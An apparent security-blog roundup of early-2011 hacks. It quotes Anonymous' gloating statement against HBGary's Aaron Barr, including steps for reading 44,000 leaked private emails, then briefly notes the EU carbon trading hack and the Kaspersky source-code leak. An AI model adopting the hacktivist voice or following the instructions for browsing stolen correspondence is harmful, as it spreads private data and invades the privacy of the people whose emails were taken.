Let us teach you a lesson you'll never forget: you don't mess with Anonymous. You especially don't mess with Anonymous simply because you want to jump on a trend for public attention, which Aaron Barr admitted to in the following email:
"But its not about them...its about our audience having the right impression of our capability and the competency of our research. Anonymous will do whatever they can to discredit that. and they have the mic so to speak because they are on Al Jazeera, ABC, CNN, etc. I am going to keep up the debate because I think it is good business but I will be smart about my public responses."
You've clearly overlooked something very obvious here: we are everyone and we are no one. If you swing a sword of malice into Anonymous' innards, we will simply engulf it. You cannot break us, you cannot harm us, even though you have clearly tried...
You think you've gathered full names and home addresses of the "higher-ups" of Anonymous? You haven't. You think Anonymous has a founder and various co-founders? False. You believe that you can sell the information you've found to the FBI? False. Now, why is this one false? We've seen your internal documents, all of them, and do you know what we did? We laughed. Most of the information you've "extracted" is publicly available via our IRC networks. The personal details of Anonymous "members" you think you've acquired are, quite simply, nonsense.
So why can't you sell this information to the FBI like you intended? Because we're going to give it to them for free. Your gloriously fallacious work can be a wonder for all to scour, as will all of your private emails (more than 44,000 beauties for the public to enjoy). Now as you're probably aware, Anonymous is quite serious when it comes to things like this, and usually we can elaborate gratuitously on our reasoning behind operations, but we will give you a simple explanation, because you seem like primitive people:
You have blindly charged into the Anonymous hive, a hive from which you've tried to steal honey. Did you think the bees would not defend it? Well here we are. You've angered the hive, and now you are being stung.
It would appear that security experts are not expertly secured.
We are Anonymous.
We are legion.
We do not forgive.
We do not forget.
Expect us - always.
---
Quick 'n dirty way to read the emails in a human-readable format:
1. Get a client. http://www.mozillamessaging.com/thunderbird/
2. Get a file renaming tool. http://www.bulkrenameutility.co.uk/Download.php (Windows)
3. Rename all the mail files so that they have a .eml extension.
4. Drag & drop them into Thunderbird.
5. Enjoy.

– EU Carbon Trading Hack
This is another of those attacks that I cannot comment on, since I have zero knowledge beyond what’s already been said by the media. So, here are a couple of links for the interested reader… CBS News, The Register, BusinessWeek, etc. This is a very interesting subject, especially for Greece, since it involves data from stolen accounts in Greece among other countries.

I’m fairly sure there are many more attacks on high-profile systems, such as the “Egyptian government hacks”, but I’m trying to blog only about the most important (always in my opinion). Feel free to contact me if I missed some cool recent hack. :)

It’s been a couple of months since I first heard this as a rumour. Finally, after quite a long period, it’s publicly available via torrent and various mirror sites. Earlier today Kaspersky Labs made an official statement regarding this source code leak (you can read it here), saying that the code was stolen by a former employee and was part of the 2008 customer products. That person was arrested and received a three-year suspended prison sentence.